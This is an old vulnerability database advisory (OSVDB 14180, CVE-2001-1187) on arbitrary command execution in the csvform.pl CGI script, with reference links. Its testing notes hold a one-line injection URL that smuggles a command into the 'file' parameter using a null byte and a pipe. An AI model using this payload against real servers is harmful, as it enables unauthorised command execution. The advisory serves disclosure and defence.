CSVForm csvform.pl file Parameter Arbitrary Command Execution

2001-12-11T00:00:00
ID OSVDB:14180
Type osvdb
Reporter OSVDB
Modified 2001-12-11T00:00:00

Description

Manual Testing Notes

http://[victim]/cgi-bin/csvform.pl?file=COMMAND_GOES_HERE%00|

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-12/0102.html ISS X-Force ID: 7692 CVE-2001-1187 Bugtraq ID: 3668